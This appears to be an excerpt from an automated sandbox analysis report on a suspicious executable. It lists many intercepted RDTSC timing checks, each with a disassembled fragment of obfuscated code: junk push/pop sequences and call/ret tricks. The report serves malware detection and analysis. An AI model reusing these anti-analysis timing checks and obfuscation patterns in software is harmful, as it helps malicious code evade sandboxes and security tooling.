                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D65508 second address: D6550F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6726D second address: D67271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6643F second address: D66444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67271 second address: D67275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66444 second address: D66449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66449 second address: D6644F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68214 second address: D68218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68218 second address: D6821C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67489 second address: D674A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6821C second address: D68222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D674A6 second address: D674AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D674AA second address: D674B4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A45C second address: D6A4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD2884F85C6h 0x00000009 jmp 00007FD2884F85D4h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 jmp 00007FD2884F85CAh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD2884F85C8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007FD2884F85D2h 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jno 00007FD2884F85C6h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4C8 second address: D6A4D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4D1 second address: D6A4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A4D7 second address: D6A4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD288CC4A6Ch 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D65F second address: D6D665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D665 second address: D6D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D669 second address: D6D713 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FD2884F85C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push edx 0x00000028 jno 00007FD2884F85C9h 0x0000002e pop ebx 0x0000002f jmp 00007FD2884F85D3h 0x00000034 push 00000000h 0x00000036 call 00007FD2884F85D7h 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007FD2884F85C8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 xchg eax, esi 0x00000059 push edx 0x0000005a jmp 00007FD2884F85D8h 0x0000005f pop edx 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D713 second address: D6D719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C572 second address: D6C58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2884F85D0h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C58C second address: D6C592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D70773 second address: D70777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C592 second address: D6C598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C665 second address: D6C669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72906 second address: D7290A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7290A second address: D7290E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7290E second address: D7291A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7291A second address: D72929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FD2884F85C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D719E5 second address: D719EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D739C5 second address: D739C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D739C9 second address: D73A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD288CC4A68h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push eax 0x00000023 cld 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 mov ebx, ecx 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c xor ecx, dword ptr [ebp+122D1BF1h] 0x00000032 and ax, 4915h 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jp 00007FD288CC4A66h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72ABF second address: D72AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73A14 second address: D73A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD288CC4A6Ch 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AC6 second address: D72AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD2884F85D3h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AE3 second address: D72AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72AE9 second address: D72AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73B67 second address: D73B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73B6B second address: D73B75 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73C51 second address: D73C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73C55 second address: D73C69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7768A second address: D776C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A71h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A73h 0x00000011 push esi 0x00000012 jc 00007FD288CC4A66h 0x00000018 jmp 00007FD288CC4A6Dh 0x0000001d pop esi 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D776C9 second address: D776D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD2884F85C6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A6E second address: D16A81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007FD288CC4A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A81 second address: D16A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16A85 second address: D16A92 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E60C second address: D7E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E610 second address: D7E625 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a jns 00007FD288CC4A68h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFB8 second address: D7DFD1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD2884F85D3h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFD1 second address: D7DFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFD7 second address: D7DFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DFDB second address: D7DFE5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E197 second address: D0E1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2884F85D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1BD second address: D0E1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1C1 second address: D0E1DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FD2884F85D0h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E1DD second address: D0E1F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A70h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D3E second address: D85D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D42 second address: D85D76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FD288CC4A74h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FD288CC4A68h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85D76 second address: D85D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18598 second address: D185B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B1C second address: D89B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B20 second address: D89B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD288CC4A71h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FD288CC4A79h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B6F second address: D89B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD2884F85D9h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A642 second address: D8A647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AA1D second address: D8AA3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AB9A second address: D8ABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F36A second address: D8F370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F370 second address: D8F38D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD288CC4A73h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F38D second address: D8F39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FAE6 second address: D8FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A6Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FAF7 second address: D8FB10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FB10 second address: D8FB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD288CC4A70h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F062 second address: D8F068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F068 second address: D8F080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900BC second address: D900C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900C2 second address: D900C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900C6 second address: D900E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9333A second address: D93372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD288CC4A76h 0x0000000a jmp 00007FD288CC4A78h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B42 second address: D56B63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2884F85D1h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B63 second address: D56B71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B71 second address: D56BC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007FD2884F85CCh 0x00000011 jmp 00007FD2884F85D0h 0x00000016 popad 0x00000017 pop eax 0x00000018 mov di, 3AF2h 0x0000001c mov cx, 9C0Dh 0x00000020 call 00007FD2884F85C9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD2884F85D6h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BC4 second address: D56BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD288CC4A66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BCF second address: D56BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BDB second address: D56C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD288CC4A6Ah 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD288CC4A78h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C09 second address: D56C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C0F second address: D56C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C13 second address: D56C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007FD2884F85D8h 0x00000010 jmp 00007FD2884F85D2h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56D01 second address: D56D06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57054 second address: D5709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 je 00007FD2884F85C6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D1B07h], edi 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD2884F85C8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 adc edi, 44B68711h 0x00000039 push eax 0x0000003a pushad 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5709B second address: D570A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570A4 second address: D570A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
